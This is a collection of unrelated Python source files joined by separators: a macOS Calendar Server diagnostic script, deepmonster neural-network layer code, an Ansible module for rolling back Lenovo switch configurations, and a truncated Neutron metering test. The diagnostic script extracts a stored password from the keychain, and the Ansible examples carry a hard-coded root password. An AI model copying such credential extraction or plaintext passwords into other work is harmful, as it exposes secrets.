print("Calendar and Contacts service processes:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/bin/ps", "ax",
"-o user",
"-o pid",
"-o %cpu",
"-o %mem",
"-o rss",
"-o etime",
"-o lstart",
"-o command"
)
for line in stdout.split("\n"):
if "_calendar" in line or "CalendarServer" in line or "COMMAND" in line:
print(line)
def showServerctlStatus():
print()
print("Serverd status:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/sbin/serverctl",
"list",
)
services = {
"org.calendarserver.agent": False,
"org.calendarserver.calendarserver": False,
"org.calendarserver.relocate": False,
}
enabledBucket = False
for line in stdout.split("\n"):
if "enabledServices" in line:
enabledBucket = True
if "disabledServices" in line:
enabledBucket = False
for service in services:
if service in line:
services[service] = enabledBucket
for service, enabled in services.iteritems():
print(
"{service} is {enabled}".format(
service=service,
enabled="enabled" if enabled else "disabled"
)
)
def showDiskSpace(serverRoot):
print()
print("Disk space on boot volume:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/bin/df",
"-H",
"/",
)
print(stdout)
print("Disk space on service data volume:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/bin/df",
"-H",
serverRoot
)
print(stdout)
print("Disk space used by Calendar and Contacts service:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/usr/bin/du",
"-sh",
os.path.join(serverRoot, "Config"),
os.path.join(serverRoot, "Data"),
os.path.join(serverRoot, "Logs"),
)
print(stdout)
def showPostgresStatus(serverRoot):
clusterPath = os.path.join(serverRoot, "Data", "Database.xpg", "cluster.pg")
print()
print("Postgres status for cluster {}:".format(clusterPath.encode("utf-8")))
code, stdout, stderr = runCommand(
"/usr/bin/sudo",
"-u",
"calendar",
"/Applications/Server.app/Contents/ServerRoot/usr/bin/pg_ctl",
"status",
"-D",
clusterPath
)
if stdout:
print(stdout)
if stderr:
print(stderr)
if code:
return False
return True
def runSQLQuery(query):
_ignore_code, stdout, stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/bin/psql",
"-h",
"/var/run/caldavd/PostgresSocket",
"--dbname=caldav",
"--username=caldav",
"--command={}".format(query),
)
if stdout:
print(stdout)
if stderr:
print(stderr)
def countFromSQLQuery(query):
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/bin/psql",
"-h",
"/var/run/caldavd/PostgresSocket",
"--dbname=caldav",
"--username=caldav",
"--command={}".format(query),
)
lines = stdout.split("\n")
try:
count = int(lines[2])
except IndexError:
count = 0
return count
def listDatabases():
_ignore_code, stdout, stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/bin/psql",
"-h",
"/var/run/caldavd/PostgresSocket",
"--dbname=caldav",
"--username=caldav",
"--list",
)
if stdout:
print(stdout)
if stderr:
print(stderr)
def showPostgresContent():
print()
print("Postgres content:")
print()
listDatabases()
print("'calendarserver' table...")
runSQLQuery("select * from calendarserver;")
count = countFromSQLQuery("select count(*) from calendar_home;")
print("Number of calendar homes: {}".format(count))
count = countFromSQLQuery("select count(*) from calendar_object;")
print("Number of calendar events: {}".format(count))
count = countFromSQLQuery("select count(*) from addressbook_home;")
print("Number of contacts homes: {}".format(count))
count = countFromSQLQuery("select count(*) from addressbook_object;")
print("Number of contacts cards: {}".format(count))
count = countFromSQLQuery("select count(*) from delegates;")
print("Number of non-group delegate assignments: {}".format(count))
count = countFromSQLQuery("select count(*) from delegate_groups;")
print("Number of group delegate assignments: {}".format(count))
print("'job' table...")
runSQLQuery("select * from job;")
def showConfigKeys():
print()
print("Configuration:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/sbin/calendarserver_config",
"EnableCalDAV",
"EnableCardDAV",
"Notifications.Services.APNS.Enabled",
"Scheduling.iMIP.Enabled",
"Authentication.Basic.Enabled",
"Authentication.Digest.Enabled",
"Authentication.Kerberos.Enabled",
"ServerHostName",
"HTTPPort",
"SSLPort",
)
hidden = [
"ServerHostName",
]
keys = {}
for line in stdout.split("\n"):
if "=" in line:
key, value = line.strip().split("=", 1)
keys[key] = value
if key not in hidden:
print("{key} : {value}".format(key=key, value=value))
return keys
def runCommand(commandPath, *args):
"""
Run a command line tool and return the output
"""
if not os.path.exists(commandPath):
raise FileNotFound
commandLine = [commandPath]
if args:
commandLine.extend(args)
child = subprocess.Popen(
args=commandLine,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
output, error = child.communicate()
return child.returncode, output, error
def getOSBuild():
try:
code, stdout, _ignore_stderr = runCommand("/usr/bin/sw_vers", "-buildVersion")
if not code:
return stdout.strip()
except:
return "Unknown"
def getServerBuild():
try:
code, stdout, _ignore_stderr = runCommand("/usr/sbin/serverinfo", "--buildversion")
if not code:
return stdout.strip()
except:
pass
return "Unknown"
def getServerRoot():
"""
Return the ServerRoot value from the servermgr_calendar.plist. If not
present, return the default.
@rtype: C{unicode}
"""
try:
serverRoot = u"/Library/Server/Calendar and Contacts"
if os.path.exists(PREFS_PLIST):
serverRoot = readPlist(PREFS_PLIST).get("ServerRoot", serverRoot)
if isinstance(serverRoot, str):
serverRoot = serverRoot.decode("utf-8")
return serverRoot
except:
return "Unknown"
def checkPlist(plistPath):
if not os.path.exists(plistPath):
raise FileNotFound
try:
readPlist(plistPath)
except:
return False
return True
def showWebApps():
print()
print("Web apps:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/sbin/webappctl",
"status",
"-"
)
print(stdout)
##
# Keychain access
##
passwordRegExp = re.compile(r'password: "(.*)"')
def getPasswordFromKeychain(account):
code, _ignore_stdout, stderr = runCommand(
"/usr/bin/security",
"find-generic-password",
"-a",
account,
"-g",
)
if code:
return None
else:
match = passwordRegExp.search(stderr)
if not match:
print(
"Password for {} not found in keychain".format(account)
)
return None
else:
return match.group(1)
readCommand = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>command</key>
<string>readConfig</string>
</dict>
</plist>
"""
def connectToAgent(password):
print()
print("Agent:")
url = "http://localhost:62308/gateway/"
user = "com.apple.calendarserver"
auth_handler = urllib2.HTTPDigestAuthHandler()
auth_handler.add_password(
realm="/Local/Default",
uri=url,
user=user,
passwd=password
)
opener = urllib2.build_opener(auth_handler)
# ...and install it globally so it can be used with urlopen.
urllib2.install_opener(opener)
# Send HTTP POST request
request = urllib2.Request(url, readCommand)
try:
print("Attempting to send a request to the agent...")
response = urllib2.urlopen(request, timeout=30)
except Exception as e:
print("Can't connect to agent: {}".format(e))
return False
html = response.read()
code = response.getcode()
if code == 200:
try:
data = readPlistFromString(html)
except Exception as e:
print(
"Could not parse response from agent: {error}\n{html}".format(
error=e, html=html
)
)
return False
if "result" in data:
print("...success")
else:
print("Error in agent's response:\n{}".format(html))
return False
else:
print("Got an error back from the agent: {code} {html}".format(
code=code, html=html)
)
return True
def connectToCaldavd(keys):
print()
print("Server connection:")
url = "https://{host}/principals/".format(host=keys["ServerHostName"])
try:
print("Attempting to send a request to port 443...")
response = urllib2.urlopen(url, timeout=30)
html = response.read()
code = response.getcode()
print(code, html)
if code == 200:
print("Received 200 response")
except urllib2.HTTPError as e:
code = e.code
reason = e.reason
if code == 401:
print("Got the expected response")
else:
print(
"Got an unexpected response: {code} {reason}".format(
code=code, reason=reason
)
)
except Exception as e:
print("Can't connect to port 443: {error}".format(error=e))
if __name__ == "__main__":
main()
|
|
import copy
from inspect import isclass
import theano.tensor as T
from deepmonster.utils import flatten
from deepmonster.nnet.baselayers import AbsLayer
from deepmonster.nnet.simple import BiasLayer
def propagate(func):
"""Network decorator to propagate a function call to all layers attribute of a class.
"""
def propagate_func(*args, **kwargs):
ff = args[0]
for i, layer in enumerate(ff.layers):
new_args = tuple([args[0], i, layer] + list(args[1:]))
func(*new_args, **kwargs)
return propagate_func
class Feedforward(object):
"""
Feedforward abstract class managing a series of Layer class.
***The logic of the attribution setting is always that if a hyperparameter
such as batch_norm is set on a Layer, it will have priority
over what is given to Feedforward constructor. If it is None and
Feedforward receives something, it will set this value to the Layer.
If a hyperparam is None in both Layer and Feedforward and Layer needs
it to do something, it will obviously crash.
"""
def __init__(self, layers, prefix, **kwargs):
self.layers = layers
self.prefix = prefix
self.fprop_passes = {}
no_init = kwargs.pop('no_init', False)
self.attr_error_tolerance = kwargs.pop('attr_error_tolerance', 'warn')
if len(kwargs) > 1:
self._set_attributes(kwargs)
# would be useful but try to not break all the past scripts
self._has_been_init = False
if not no_init:
#self.set_io_dims()
self.initialize()
self._has_been_init = True
def __repr__(self):
# printing an empty string would be quite boring
if hasattr(self, 'prefix') and self.prefix != '':
return self.prefix
return super(Feedforward, self).__repr__()
@property
def params(self):
return find_attributes(self.layers, 'params')
# sugar syntax, but much needed sugar
@property
def parameters(self):
return self.params
@property
def outputs_info(self):
return tuple(find_attributes(self.layers, 'outputs_info'))
@property
def output_dims(self):
return self.layers[-1].output_dims
@property
def input_dims(self):
return self.layers[0].input_dims
def _recurrent_warning(self, msg):
# this is a poor way to do it but it works!
if msg != getattr(self, 'last_msg', ''):
print msg
self.last_msg = msg
# ---- THESE METHODS ARE PROPAGATED WHEN CALLED ----
# exemple : foo = Feedforward(layers, 'foo', **fooconfig)
# foo.switch_for_inference()
# will propagate switch_for_inference to all layers
@propagate
def _set_attributes(self, i, layer, dict_of_hyperparam):
if hasattr(layer, '_set_attributes'):
layer._set_attributes(dict_of_hyperparam)
self.set_attributes(layer, dict_of_hyperparam)
@propagate
def set_io_dims(self, i, layer, tup=None):
if i == 0 :
if not hasattr(layer, 'input_dims') and tup is None:
raise ValueError("The very first layer of this chain needs its input_dims!")
input_dims = getattr(layer, 'input_dims', (None,))
if None in input_dims:
dims = tup
else:
dims = input_dims
else:
dims = self.layers[i-1].output_dims
layer.set_io_dims(dims)
@propagate
def initialize(self, i, layer, **kwargs):
if self._has_been_init:
msg = self.prefix + " already have been init, supressing this init call"
self._recurrent_warning(msg)
return
layer.prefix = self.prefix + str(i)
tup = kwargs.pop('tup', None)
if i == 0 :
if not hasattr(layer, 'input_dims') and tup is None:
raise ValueError("The very first layer of this chain needs its input_dims!")
input_dims = getattr(layer, 'input_dims', (None,))
if None in input_dims:
dims = tup
else:
dims = input_dims
else:
dims = self.layers[i-1].output_dims
layer.initialize(dims, **kwargs)
@propagate
def _fprop(self, i, layer, **kwargs):
input_id = kwargs.pop('input_id', 0)
if i < input_id:
return
# kwargs filtering
for keyword in kwargs.keys():
if keyword not in layer.accepted_kwargs_fprop:
kwargs.pop(keyword)
if self.concatenation_tags.has_key(i):
_input = T.concatenate([self.activations_list[-1]] +
self.concatenation_tags[i][0],
axis=self.concatenation_tags[i][1])
else:
_input = self.activations_list[-1]
y = layer.fprop(_input, **kwargs)
self.activations_list.append(y)
@propagate
def _get_outputs_info(self, i, layer, *args, **kwargs):
if hasattr(layer, 'get_outputs_info'):
self._outputs_info += layer.get_outputs_info(*args, **kwargs)
# ------------------------------------------------- #
def set_attributes(self, layer, dict_of_hyperparam):
"""
"""
for attr_name, attr_value in dict_of_hyperparam.iteritems() :
# if attr_name is set to a layer, it will keep that layer's attr_value
try :
attr = getattr(layer, attr_name)
except AttributeError :
self.attribute_error(layer, attr_name)
continue
if attr is None:
if isinstance(attr_value, AbsLayer):
# make sure every layer has its own unique instance of the class
# deepcopy is very important or they might share unwanted stuff
# across layers (ex.: params)
attr_value = copy.deepcopy(attr_value)
setattr(layer, attr_name, attr_value)
elif isinstance(attr, tuple):
# a (None,) wont trigger at the first if, but it doesn't count!
if attr[0] is None:
setattr(layer, attr_name, utils.parse_tuple(attr_value, len(attr)))
def attribute_error(self, layer, attr_name, message='default'):
if message == 'default':
message = "trying to set layer "+ layer.__class__.__name__ + \
" with attribute " + attr_name
if self.attr_error_tolerance is 'warn' :
print "WARNING:", message
elif self.attr_error_tolerance is 'raise' :
raise AttributeError(message)
#TODO: make concatenation_tags actually an input injecting mechanism through the
# input injecting layers, it would make it possible to use the same logic to do different
# input injection.
def fprop(self, x, output_id=-1, pass_name=None, concatenation_tags=None, **kwargs):
"""Forward propagation passes through each self.layers
Accepted keywords:
- inpud_id : use this index to start the fprop at that point in the feedforward block
- output_id : will return this index, can use 'all' for returning the whole list
***WARNING: Index 0 is the input! The output of the first layer starts at index 1***
- pass_name : if defined, will update the fprop_passes dict with {pass_name : activations_list}.
The primary use is when ones want to use the same network more than once and needs to
store somewhere the activations being created at each fprop passes.
- concatenation_tags: Inject input at different stages in the fprop chain,
dictionnary of format:
- {int: (list[tensor,], int)} OR {int: list[tensor,]} OR {int: tensor}
- int: layer id to inject inputs with concatenation
- list[tensor,] OR tensor: list of tensors or tensor to inject
- (optionnaly) int: axis of concat.
"""
# standarize the dict with {id of layer to inject input :
# (list of tensors to concat, which axis)}
if concatenation_tags is not None:
assert isinstance(concatenation_tags, dict), "concat tag needs to be a dict"
# we could point directly to the layers with their name?
assert all([isinstance(k, int) for k in concatenation_tags.keys()]), \
"concat dict keys need to be int"
for key, val in concatenation_tags.iteritems():
if not isinstance(val, (list, tuple)) or len(val) == 1 or not isinstance(val[1], int):
val = [val, None]
else:
assert len(val) == 2
if not isinstance(val[0], list):
val = [[val[0]], val[1]]
assert len(set([v.ndim for v in val[0]])) == 1, "A list of tensors " +\
"to concat was given but not all have same dim"
if val[1] is None:
# default on the channel axis
ndim = val[0][0].ndim
val[1] = ndim - 3 if ndim in [4, 5] else ndim - 1
concatenation_tags[key] = tuple(val)
else:
concatenation_tags = {}
self.concatenation_tags = concatenation_tags
self.activations_list = [x]
self._fprop(**kwargs)
if pass_name is not None:
assert isinstance(pass_name, str), "pass_name needs to be a string"
self.fprop_passes.update({pass_name : self.activations_list})
# they are useful only for a single pass and should not be kept as state variable
del self.concatenation_tags
if output_id == 'all':
return self.activations_list
elif isinstance(output_id, list):
return [self.activations_list[i] for i in output_id]
else:
return self.activations_list[output_id]
def get_outputs_info(self, *args, **kwargs):
self._outputs_info = []
self._get_outputs_info(*args, **kwargs)
return self._outputs_info
class StandardBlock(Feedforward):
"""Standard blocks of Layers module. Every piece of the Layer class could technically
be used all seperatly, but this encapsulate the regular usage of layer i.e.:
y = activation(normalization(apply(W,x) + b))
- y: output
- x: input
- W: apply parameters
- b: bias parameters
- apply: some method coupling x and W together (ex.: FullyConnectedLayer: dot)
- normalization: normalization class instnace normalizing the output of apply
(ex.: BatchNorm)
- activation: activation class instance applying a function before the output
(ex.: Rectifier or ReLU)
The block interface is designed to work with Feedforward in order to initialize multiple layers
in a somewhat lazy way. For this it provides set_attributes method where it allows keywords not
given at __init__ time to be given to Feedforward so it can propagate them all and set them on
its list of layers. This comes with the cost that we do not know at __init__ time how to
construct the block. It is therefore done in construct_block method that should ideally
be called after __init__ and set_attributes.
"""
apply_layer_type = NotImplemented
# special kwargs shared with its apply layer
shared_with_apply_kwargs = ['initialization', 'param_norm']
def __init__(self, *args, **kwargs):
# filter kwargs, after this it should contain only apply layer kwargs
# and return the one for this class
kwargs = self.parse_kwargs(**kwargs)
self.set_apply_layer(args, kwargs)
def parse_kwargs(self, bias=True, apply_layer=None, activation_norm=None,
activation=None, initialization=None, param_norm=None,
attr_error_tolerance='warn', apply_fetch=None, **kwargs):
"""Because def __init__(self, *args, a_kwarg=a_default_val, **kwargs) is a python
syntax error, we cannot write the __init__ of StandardBlock this way. The constructor
of StandardBlock pipes args and kwargs for the constructor of its apply Layer. Kwargs
dedicated for itself are defined here and unpack while passing **kwargs to this method
at __init__ time.
"""
for k, v in locals().iteritems():
if k == 'kwargs':
continue
setattr(self, k ,v)
kwargs.update({x: getattr(self, x) for x in self.shared_with_apply_kwargs})
return kwargs
@property
def layers(self):
# block follow the strict layer order: apply, bias, act_norm, act
layers = filter(
lambda x: x is not None,
[getattr(self, x, None) for x in ['apply_layer', 'bias_layer', 'activation_norm_layer', 'activation']])
return layers
def set_apply_layer(self, args, kwargs):
"""Set the apply layer
"""
if self.apply_layer is None and self.apply_layer_type is NotImplemented:
raise NotImplementedError("No apply layer given to construct this block")
if self.apply_layer is not None and self.apply_layer_type is not NotImplemented:
raise RuntimeError("Ambiguity while trying to construct a standard block")
if isinstance(self.apply_layer, AbsLayer):
return
elif isinstance(self.apply_fetch, str):
assert isinstance(self.apply_layer_type, dict), \
"Cannot fetch apply layer by string if its apply_layer_type is not implemented as a dict"
ApplyLayer = self.apply_layer_type[self.apply_fetch]
elif isclass(self.apply_layer):
ApplyLayer = self.apply_layer
elif self.apply_layer is None:
if isinstance(self.apply_layer_type, dict):
ApplyLayer = self.apply_layer_type['default']
else:
ApplyLayer = self.apply_layer_type
else:
raise ValueError("Does not recognize apply layer")
self.apply_layer = ApplyLayer(*args, **kwargs)
#def set_attributes(self, layer, dict_of_hyperparam):
# import ipdb; ipdb.set_trace()
# # since we are catching set_attributes, self and layer are this object
# # first set attributes on the whole block
# super(StandardBlock, self).set_attributes(layer, dict_of_hyperparam)
# # second propagate it down its own layers list
# super(StandardBlock, self)._set_attributes(dict_of_hyperparam)
def get_layer(self, layerkey):
layer_opt = getattr(self, layerkey)
if layer_opt is None or layer_opt is False:
return None
elif isinstance(layer_opt, AbsLayer):
return layer_opt
elif layerkey == 'bias' and layer_opt is True:
bias_kwargs = {x: getattr(self, x, None) for x in ['initialization', 'param_norm']}
return BiasLayer(**bias_kwargs)
elif isclass(layer_opt):
raise ValueError(
"A class {} was given for layer creation in block, needs an instance".format(layer_opt))
raise ValueError("Does not recognize {}".format(layerkey))
def initialize(self, *args, **kwargs):
"""Complete the block's initialization. ApplyLayer should already exists.
Since some layers have parameters, Initialization and ParamNorm affects all ParametrizedLayer
in the block.
"""
# apply layer was already set
# set bias layer
if self.activation_norm is not None:
self.bias = False
self.bias_layer = self.get_layer('bias')
# set activation norm layer
self.activation_norm_layer = self.get_layer('activation_norm')
# set activation layer
self.activation_layer = self.get_layer('activation')
#self.activation_layer = self.activation \
# if self.activation is not None else None
# we can now safely propagate initialize call on this block of layers
# this flag is for the inner layers init
self._has_been_init = False
tup = args[0]
kwargs.update({'tup': tup})
super(StandardBlock, self).initialize(**kwargs)
def find_attributes(L, a):
# return a FLAT list of all attributes found
if isinstance(L, set):
L = list(L)
elif not isinstance(L, (list, tuple)):
L = [L]
attributes = []
for l in L:
attributes += flatten(getattr(l, a, []))
return attributes
def find_nets(localz):
# this is for the lazy :)
# give locals() as argument to the script defining the networks
return [item for key, item in localz.iteritems() \
if isinstance(item, Feedforward) and key != 'Feedforward']
if __name__ == '__main__':
from simple import FullyConnectedLayer
lay = [
FullyConnectedLayer(input_dims=45, output_dims=50)
]
feedfor = Feedforward(lay, 'ok', **{})
import ipdb; ipdb.set_trace()
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to Rollback Config back to Lenovo Switches
#
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_rollback
author: "Anil Kumar Muraleedharan (@amuraleedhar)"
short_description: Roll back the running or startup configuration from a remote
server on devices running Lenovo CNOS
description:
- This module allows you to work with switch configurations. It provides a
way to roll back configurations of a switch from a remote server. This is
achieved by using startup or running configurations of the target device
that were previously backed up to a remote server using FTP, SFTP, TFTP,
or SCP. The first step is to create a directory from where the remote
server can be reached. The next step is to provide the full file path of
he backup configuration's location. Authentication details required by the
remote server must be provided as well.
By default, this method overwrites the switch's configuration file with
the newly downloaded file. This module uses SSH to manage network device
configuration. The results of the operation will be placed in a directory
named 'results' that must be created by the user in their local directory
to where the playbook is run.
version_added: "2.3"
extends_documentation_fragment: cnos
options:
configType:
description:
- This refers to the type of configuration which will be used for
the rolling back process. The choices are the running or startup
configurations. There is no default value, so it will result
in an error if the input is incorrect.
required: Yes
default: Null
choices: [running-config, startup-config]
protocol:
description:
- This refers to the protocol used by the network device to
interact with the remote server from where to download the backup
configuration. The choices are FTP, SFTP, TFTP, or SCP. Any other
protocols will result in error. If this parameter is not
specified, there is no default value to be used.
required: Yes
default: Null
choices: [SFTP, SCP, FTP, TFTP]
rcserverip:
description:
- This specifies the IP Address of the remote server from where the
backup configuration will be downloaded.
required: Yes
default: Null
rcpath:
description:
- This specifies the full file path of the configuration file
located on the remote server. In case the relative path is used as
the variable value, the root folder for the user of the server
needs to be specified.
required: Yes
default: Null
serverusername:
description:
- Specify username for the server relating to the protocol used.
required: Yes
default: Null
serverpassword:
description:
- Specify password for the server relating to the protocol used.
required: Yes
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_rollback.
These are written in the main.yml file of the tasks directory.
---
- name: Test Rollback of config - Running config
cnos_rolback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: running-config
protocol: "sftp"
serverip: "10.241.106.118"
rcpath: "/root/cnos/G8272-running-config.txt"
serverusername: "root"
serverpassword: "root123"
- name: Test Rollback of config - Startup config
cnos_rolback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: startup-config
protocol: "sftp"
serverip: "10.241.106.118"
rcpath: "/root/cnos/G8272-startup-config.txt"
serverusername: "root"
serverpassword: "root123"
- name: Test Rollback of config - Running config - TFTP
cnos_rolback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: running-config
protocol: "tftp"
serverip: "10.241.106.118"
rcpath: "/anil/G8272-running-config.txt"
serverusername: "root"
serverpassword: "root123"
- name: Test Rollback of config - Startup config - TFTP
cnos_rolback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: startup-config
protocol: "tftp"
serverip: "10.241.106.118"
rcpath: "/anil/G8272-startup-config.txt"
serverusername: "root"
serverpassword: "root123"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Config file tranferred to Device"
'''
import sys
import time
import socket
import array
import json
import time
import re
import os
try:
from ansible.module_utils.network.cnos import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
# Utility Method to rollback the running config or start up copnfig
# This method supports only SCP or SFTP or FTP or TFTP
def doConfigRollBack(module, prompt, answer):
host = module.params['host']
server = module.params['serverip']
username = module.params['serverusername']
password = module.params['serverpassword']
protocol = module.params['protocol'].lower()
rcPath = module.params['rcpath']
configType = module.params['configType']
confPath = rcPath
retVal = ''
command = "copy " + protocol + " " + protocol + "://"
command = command + username + "@" + server + "/" + confPath
command = command + " " + configType + " vrf management\n"
cnos.debugOutput(command + "\n")
# cnos.checkForFirstTimeAccess(module, command, 'yes/no', 'yes')
cmd = []
if(protocol == "scp"):
scp_cmd1 = [{'command': command, 'prompt': 'timeout:', 'answer': '0'}]
scp_cmd2 = [{'command': '\n', 'prompt': 'Password:',
'answer': password}]
cmd.extend(scp_cmd1)
cmd.extend(scp_cmd2)
if(configType == 'startup-config'):
scp_cmd3 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(scp_cmd3)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
elif(protocol == "sftp"):
sftp_cmd = [{'command': command, 'prompt': 'Password:',
'answer': password}]
cmd.extend(sftp_cmd)
# cnos.debugOutput(configType + "\n")
if(configType == 'startup-config'):
sftp_cmd2 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(sftp_cmd2)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
elif(protocol == "ftp"):
ftp_cmd = [{'command': command, 'prompt': 'Password:',
'answer': password}]
cmd.extend(ftp_cmd)
if(configType == 'startup-config'):
ftp_cmd2 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(ftp_cmd2)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
elif(protocol == "tftp"):
command = "copy " + protocol + " " + protocol
command = command + "://" + server + "/" + confPath
command = command + " " + configType + " vrf management\n"
cnos.debugOutput(command)
tftp_cmd = [{'command': command, 'prompt': None, 'answer': None}]
cmd.extend(tftp_cmd)
if(configType == 'startup-config'):
tftp_cmd2 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(tftp_cmd2)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
else:
return "Error-110"
return retVal
# EOM
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=False),
username=dict(required=False),
password=dict(required=False, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),
configType=dict(required=True),
protocol=dict(required=True),
serverip=dict(required=True),
rcpath=dict(required=True),
serverusername=dict(required=False),
serverpassword=dict(required=False, no_log=True),),
supports_check_mode=False)
outputfile = module.params['outputfile']
protocol = module.params['protocol'].lower()
output = ''
if protocol in ('tftp', 'ftp', 'sftp', 'scp'):
transfer_status = doConfigRollBack(module, None, None)
else:
transfer_status = 'Invalid Protocol option'
output = output + "\n Config Transfer status \n" + transfer_status
# Save it into the file
if '/' in outputfile:
path = outputfile.rsplit('/', 1)
# cnos.debugOutput(path[0])
if not os.path.exists(path[0]):
os.makedirs(path[0])
file = open(outputfile, "a")
file.write(output)
file.close()
# need to add logic to check when changes occur or not
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Config file tranferred to Device")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
|
# Copyright (C) 2013 eNovance SAS <[email protected]>
#
# Author: Sylvain Afchain <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.api.v2 import attributes as attr
from neutron.common import constants as n_constants
from neutron.common import topics
from neutron import context
from neutron.db import agents_db
from neutron.db import l3_agentschedulers_db
from neutron.db.metering import metering_rpc
from neutron.extensions import l3 as ext_l3
from neutron.extensions import metering as ext_metering
from neutron import manager
from neutron.openstack.common import timeutils
from neutron.openstack.common import uuidutils
from neutron.plugins.common import constants
from neutron.tests.unit.db.metering import test_db_metering
from neutron.tests.unit import test_db_plugin
from neutron.tests.unit import test_l3_plugin
_uuid = uuidutils.generate_uuid
METERING_SERVICE_PLUGIN_KLASS = (
"neutron.services.metering."
"metering_plugin.MeteringPlugin"
)
class MeteringTestExtensionManager(object):
def get_resources(self):
attr.RESOURCE_ATTRIBUTE_MAP.update(ext_metering.RESOURCE_ATTRIBUTE_MAP)
attr.RESOURCE_ATTRIBUTE_MAP.update(ext_l3.RESOURCE_ATTRIBUTE_MAP)
l3_res = ext_l3.L3.get_resources()
metering_res = ext_metering.Metering.get_resources()
return l3_res + metering_res
def get_actions(self):
return []
def get_request_extensions(self):
return []
class TestMeteringPlugin(test_db_plugin.NeutronDbPluginV2TestCase,
test_l3_plugin.L3NatTestCaseMixin,
test_db_metering.MeteringPluginDbTestCaseMixin):
resource_prefix_map = dict(
(k.replace('_', '-'), constants.COMMON_PREFIXES[constants.METERING])
for k in ext_metering.RESOURCE_ATTRIBUTE_MAP.keys()
)
def setUp(self):
plugin = 'neutron.tests.unit.test_l3_plugin.TestL3NatIntPlugin'
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS}
ext_mgr = MeteringTestExtensionManager()
super(TestMeteringPlugin, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.uuid = '654f6b9d-0f36-4ae5-bd1b-01616794ca60'
uuid = 'neutron.openstack.common.uuidutils.generate_uuid'
self.uuid_patch = mock.patch(uuid, return_value=self.uuid)
self.mock_uuid = self.uuid_patch.start()
fanout = ('neutron.common.rpc_compat.RpcProxy.fanout_cast')
self.fanout_patch = mock.patch(fanout)
self.mock_fanout = self.fanout_patch.start()
self.tenant_id = 'a7e61382-47b8-4d40-bae3-f95981b5637b'
self.ctx = context.Context('', self.tenant_id, is_admin=True)
self.context_patch = mock.patch('neutron.context.Context',
return_value=self.ctx)
self.mock_context = self.context_patch.start()
self.topic = 'metering_agent'
def test_add_metering_label_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected = {'args': {'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
tenant_id_2 = '8a268a58-1610-4890-87e0-07abb8231206'
self.mock_uuid.return_value = second_uuid
with self.router(name='router2', tenant_id=tenant_id_2,
